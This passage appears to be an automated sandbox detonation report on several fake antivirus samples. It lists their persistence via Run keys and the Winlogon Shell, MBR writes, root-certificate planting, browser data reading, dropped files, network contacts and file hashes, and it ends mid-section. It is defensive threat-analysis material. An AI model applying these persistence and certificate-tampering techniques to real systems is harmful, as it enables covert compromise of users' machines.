US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 highway-traffic.com udp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 fastsofgeld.com udp
US 8.8.8.8:53 frequentwin.com udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 highway-traffic.com udp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 fastsofgeld.com udp
US 8.8.8.8:53 frequentwin.com udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

MD5 7fad92afda308dca8acfc6ff45c80c24
SHA1 a7fa35e7f90f772fc943c2e940737a48b654c295
SHA256 76e19416eb826a27bdcf626c3877cf7812bbe9b62cc2ccc5c2f65461d644246f
SHA512 49eed1e1197401cb856064bf7fdbd9f3bc57f3c864d47f509346d44eed3b54757d8c6cdb6254990d21291065f0762d2a1588d09e43c5728f77a420f6a8dcd6ea

Analysis: behavioral11

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

144s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Fake AV\\AntivirusPro2017.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence

Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPro2017.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 twinkcam.net udp
US 103.224.212.215:80 twinkcam.net tcp
US 8.8.8.8:53 ww25.twinkcam.net udp
US 199.59.243.225:80 ww25.twinkcam.net tcp

Files

memory/2484-0-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-2-0x0000000000220000-0x0000000000221000-memory.dmp

memory/2484-1-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-4-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-6-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2484-5-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-7-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-8-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-9-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-11-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-10-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-12-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2484-13-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-15-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-16-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-17-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-20-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-21-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-22-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-23-0x0000000000400000-0x0000000000A06000-memory.dmp

memory/2484-24-0x0000000000400000-0x0000000000A06000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

120s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe"

Signatures

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Modifies system certificate store

evasion spyware trojan

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46 C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\Temp\6AdwCleaner.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.vikingwebscanner.com udp

Files

memory/2388-0-0x0000000000C70000-0x0000000000C9E000-memory.dmp

memory/2388-1-0x000007FEF5CA0000-0x000007FEF668C000-memory.dmp

memory/2388-2-0x000000001B260000-0x000000001B2E0000-memory.dmp

memory/2388-3-0x000000001B260000-0x000000001B2E0000-memory.dmp

memory/2388-4-0x000000001B260000-0x000000001B2E0000-memory.dmp

memory/2388-5-0x000000001B260000-0x000000001B2E0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar9A24.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/2388-104-0x000007FEF5CA0000-0x000007FEF668C000-memory.dmp

memory/2388-105-0x000000001B260000-0x000000001B2E0000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe"

Signatures

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\HappyAntivirus.exe"

Network

N/A

Files

memory/1784-0-0x0000000000EC0000-0x00000000010B2000-memory.dmp

memory/1784-1-0x0000000074D30000-0x000000007541E000-memory.dmp

memory/1784-2-0x0000000004CA0000-0x0000000004CE0000-memory.dmp

memory/1784-3-0x0000000004CA0000-0x0000000004CE0000-memory.dmp

memory/1784-4-0x0000000074D30000-0x000000007541E000-memory.dmp

memory/1784-5-0x0000000004CA0000-0x0000000004CE0000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240220-en

Max time kernel

142s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\SoftProz = "C:\\Program Files (x86)\\HjuTygFcvX\\lpsprt.exe" C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\HjuTygFcvX C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File created C:\Program Files (x86)\HjuTygFcvX\__tmp_rar_sfx_access_check_259398446 C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File created C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File opened for modification C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe"

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"

Network

N/A

Files

\Program Files (x86)\HjuTygFcvX\lpsprt.exe

MD5 2e6360eeebcafd207ad6f4cfc81afdb3
SHA1 6d85d48c8c809ad0ee5f7b1b20ef79e871466072
SHA256 3a31f386f4a68827d8cbfeb087c017f871d80ab4565a2266f692fbe6cfea9c3b
SHA512 36e1cadeff91158c0e96585d7550dc193a6470f5fccf3cf98845c4291becc6dae39609771cc8157493bc6cb405446ac55a1790108c6c213293bf4a56ecf381e4

memory/2580-18-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2580-19-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-20-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2580-21-0x000000001AFD0000-0x000000001B16C000-memory.dmp

memory/2580-23-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-22-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-24-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2580-25-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-26-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

memory/2580-27-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-28-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-29-0x0000000000A10000-0x0000000000A90000-memory.dmp

memory/2580-30-0x0000000000A10000-0x0000000000A90000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

145s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009 C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\__tmp_rar_sfx_access_check_259417073 C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe"

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 yandex.ru udp
US 8.8.8.8:53 google.ru udp
RU 5.255.255.70:80 yandex.ru tcp
GB 216.58.213.3:80 google.ru tcp
RU 5.255.255.70:443 yandex.ru tcp

Files

\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 c18a7323332b3292a8e0f1c81df65698
SHA1 bcb8f34cbe0137e888d06acbcb6508417851a087
SHA256 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8
SHA512 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 5836a2a04328c778e9a485fe7d8c7aaa
SHA1 5a3214379be96f52fc6c639de17efa6e66b12188
SHA256 98d6b205baa9c6167d2c7a7a4b4804f74a7795724dd894c2de0b6823b83e6f2a
SHA512 a66a9c1d97736d63fd9fc38743d9313b726f40c4f522065c71eb0f8f9c0b797e51f5927c7c03041b2cbcb7ae1b23ed46b0fba3eb0f946adb172bcb7ab5551948

\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 cfefcac1f28b2c3d8facac87c05fba83
SHA1 7370ffee89bea5ee9f298b6a5bdec945f1714175
SHA256 78b77d996c5c0f95ad044f219e5899858c2eda73b0c094e9b9228828f22fd501
SHA512 efa53779ea99553a3618b10e43ac6dd37cafb1fcf45ab7015f54925ecfe4aa9dd9c62258983f2e0e2f5dc221cc6fc669df2c26d610c58081719c301bc0e4e699

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 d794146696509541e8d1efbd2e9d0934
SHA1 dbb5b432734f357a28f42871dcedacfcd55053a7
SHA256 bef3c4dda6aafab6d7cc57eb921c51ca4bdba2365405810a551d652773a6d420
SHA512 b23ccb74a7cece8d4cca46d86c91688842414b0f28377bf59b29249e5c3743147797c9042806848f6dd40196d3d5e09ac217feb809c4f73139901fb611e50cb5

C:\Program Files (x86)\antiviruspc2009\libltdl3.dll

MD5 00a71b4afda8033235432b1c433fecc7
SHA1 d7b0c218aa8fec1c60ada26a09d9e0d9601985ca
SHA256 f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd
SHA512 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a

C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll

MD5 0ab7d0e87f3843f8104b3670f5a9af62
SHA1 10c09a12e318f0fbebf70c4c42ad6ee31d9df2e5
SHA256 8aecab563b3c629e8f9dcd525dc2d6b1903f6c600637e63b1efe05e3c64d757b
SHA512 e08e17167edf461c0fca1e8b649c0c395793e80f5400f5cbb7d7906d0c99e955fcf6be2300db8663d413c4b3ffb075112a6ce5bf259553c0fd3d76200ee0d375

\Program Files (x86)\antiviruspc2009\bzip2.dll

MD5 4143d4973e0f5a5180e114bdd868d4d2
SHA1 b47fd2cf9db0f37c04e4425085fb953cbce81478
SHA256 da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76
SHA512 e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 44d8f1b5659f5512ae3309e65ed77040
SHA1 c3f66712509d3613b4b77d02cebdb2227999431b
SHA256 a6570473a07f88638779ae2c84598c5536e864e0038fdfb76fa8b0acafae6560
SHA512 b30e5ed41d5beacd211a8df120556be52ad65df436fa1a29215799b22ee3014379b986a99e475d51a50df9907f8e1255e26d9cb81201d638833707af13a13efa

memory/2556-25-0x0000000068440000-0x0000000068457000-memory.dmp

memory/2556-24-0x000000006FDC0000-0x000000006FDCE000-memory.dmp

memory/2556-32-0x000000006FDC0000-0x000000006FDCE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\antiviruspc2009 C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\__tmp_rar_sfx_access_check_240604609 C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File created C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe N/A

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AnViPC2009.exe"

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 google.ru udp
US 8.8.8.8:53 yandex.ru udp
RU 77.88.55.60:80 yandex.ru tcp
GB 216.58.213.3:80 google.ru tcp
RU 77.88.55.60:443 yandex.ru tcp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 60.55.88.77.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp

Files

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

MD5 c18a7323332b3292a8e0f1c81df65698
SHA1 bcb8f34cbe0137e888d06acbcb6508417851a087
SHA256 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8
SHA512 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad

C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll

MD5 0ab7d0e87f3843f8104b3670f5a9af62
SHA1 10c09a12e318f0fbebf70c4c42ad6ee31d9df2e5
SHA256 8aecab563b3c629e8f9dcd525dc2d6b1903f6c600637e63b1efe05e3c64d757b
SHA512 e08e17167edf461c0fca1e8b649c0c395793e80f5400f5cbb7d7906d0c99e955fcf6be2300db8663d413c4b3ffb075112a6ce5bf259553c0fd3d76200ee0d375

C:\Program Files (x86)\antiviruspc2009\bzip2.dll

MD5 4143d4973e0f5a5180e114bdd868d4d2
SHA1 b47fd2cf9db0f37c04e4425085fb953cbce81478
SHA256 da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76
SHA512 e21827712a4870461921e7996506ffe456dd2303b69de370aa0499dde2e4747a73d8c0e8bd7d91c5bbc414ed5ee06f36d172237489494b3dd311ccd95ba07ebc

C:\Program Files (x86)\antiviruspc2009\libltdl3.dll

MD5 00a71b4afda8033235432b1c433fecc7
SHA1 d7b0c218aa8fec1c60ada26a09d9e0d9601985ca
SHA256 f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd
SHA512 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a

memory/4200-27-0x000000006FDC0000-0x000000006FDCE000-memory.dmp

memory/4200-28-0x0000000068440000-0x0000000068457000-memory.dmp

memory/4200-33-0x000000006FDC0000-0x000000006FDCE000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:36

Platform

win7-20240220-en

Max time kernel

8s

Max time network

10s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe"

Signatures

Modifies WinLogon for persistence

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\gog.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
